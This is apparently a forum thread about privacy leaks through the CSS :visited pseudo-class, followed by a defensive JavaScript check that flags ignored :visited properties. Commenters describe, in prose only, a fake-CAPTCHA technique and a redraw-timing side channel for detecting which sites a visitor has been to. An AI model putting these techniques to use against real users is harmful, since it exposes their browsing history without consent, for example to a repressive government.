It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the :visited pseudo-class, it doesn't strike me as a particularly dangerous leak. That's why this proof of concept can detect if you've been to, say, twitter.com, but not a specific user page or tweet.
OP mentioned that colors are the only properties of visited links that can be styled with CSS. For good reason, otherwise you could brute-force thousands of URLs onto the page and hide the ones that don't match, leaving the victim none the wiser.
OP mentioned that colors are the only properties of visited links that can be styled with CSS.
So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access the :visited pseudo-class using JavaScript or anything else, IIRC. Any styling of :visited elements only appears to the end user. The reason why the "captcha" attack works is because you're actively clicking (visited) links, which then is an event that can be exfiltrated back to the server.
brute-force thousands of URLs onto the page
Also, there is actually another attack that can bypass the need to click by kinda doing this. If you load an absolutely ridiculous number of URLs (that the user hasn't visited, i.e. something long and random) onto a page, and then change them all to a link you suspect the user has visited, the time the browser takes to redraw the page if the link color changes is actually measurable. This is a known issue and a WONTFIX (for performance reasons).
Consider this scenario though:
A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and YouTube to get around the Great Firewall. They go to a site, fill out this counterfeit CAPTCHA, and out to the government that they use banned sites.
The privacy issues around :visited are often more insidious than they appear.
Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply having the URL in one's browser history be enough to justify an arrest? Seems like there's room for plausible deniability: if you attempt to load a URL but are unable to reach it (because it's blocked, doesn't exist, you're offline, etc.) it still gets saved in your history, even though you didn't retrieve any content from it. Maybe you unintentionally followed a rogue link or redirect. Maybe someone else had access to your computer. Would even the most totalitarian regime act on something so tenuous? I'm not sure.
I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem. Whether they act on it and disappear the person who did it, or whether they simply put the person on a list to watch, it's all bad.
The real takeaway is that it took me about a half second to think of a way this plausibly infringes on someone's privacy. Someone who is looking to actively infringe on privacy can likely be a lot more effective at it.
The answer is probably: "If they wanted a pretext for an action they were going to take anyway." But at that point, the pretext barely matters.
There's also some history to :visited that may be interesting.
A minor note about :visited is that it is actually quite a limited pseudo-element. The only usable CSS properties for :visited are: color, background-color, border-color, border-bottom-color, ...
Notably, these are all colour related; you cannot extend this to images, due to the privacy restrictions on this pseudo element.
So don't do captchas that rely entirely on colour!
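As an added example (not code from the thread or from any commenter): a small stylesheet check that reports declarations inside :visited rules which browsers will silently ignore under the privacy restriction the comments above describe. The thread names color, background-color, border-color and border-bottom-color; the remaining entries in the allow-list and the sample stylesheet are assumptions of this example.

```javascript
// Colour-type properties honoured on :visited. The first four are the ones the
// thread names; the rest follow the browser allow-list as documented by vendors
// and are an assumption to verify against the current spec.
const VISITED_ALLOWED = new Set([
  'color', 'background-color',
  'border-color', 'border-top-color', 'border-right-color',
  'border-bottom-color', 'border-left-color',
  'outline-color', 'column-rule-color',
  'text-decoration-color', 'text-emphasis-color',
  'fill', 'stroke',
]);

// Parse flat "selector { prop: value; ... }" blocks out of a stylesheet.
// Deliberately simple: comments are stripped first, nested at-rules are not handled.
function parseRules(css) {
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, '');
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(stripped)) !== null) {
    const selector = m[1].trim();
    const properties = m[2].split(';')
      .map(d => d.trim())
      .filter(d => d.includes(':'))                       // skip empties / junk
      .map(d => d.slice(0, d.indexOf(':')).trim().toLowerCase());
    rules.push({ selector, properties });
  }
  return rules;
}

// Returns every declaration in a :visited rule that will have no effect,
// i.e. any property outside the colour allow-list.
function findIgnoredVisitedProps(css) {
  const findings = [];
  for (const { selector, properties } of parseRules(css)) {
    if (!/:visited\b/.test(selector)) continue;
    for (const prop of properties) {
      if (!VISITED_ALLOWED.has(prop)) findings.push({ selector, prop });
    }
  }
  return findings;
}

// Constructed sample stylesheet: the second rule tries to restyle visited links
// in ways a browser will not apply (image swap, hiding the element).
const SAMPLE_CSS = `
a:visited { color: purple; border-bottom-color: purple; }
a.captcha:visited { background-image: url(tick.png); display: none; color: red; }
a:hover { text-decoration: underline; }
`;
```

Running findIgnoredVisitedProps(SAMPLE_CSS) reports background-image and display on a.captcha:visited; the colour declarations pass.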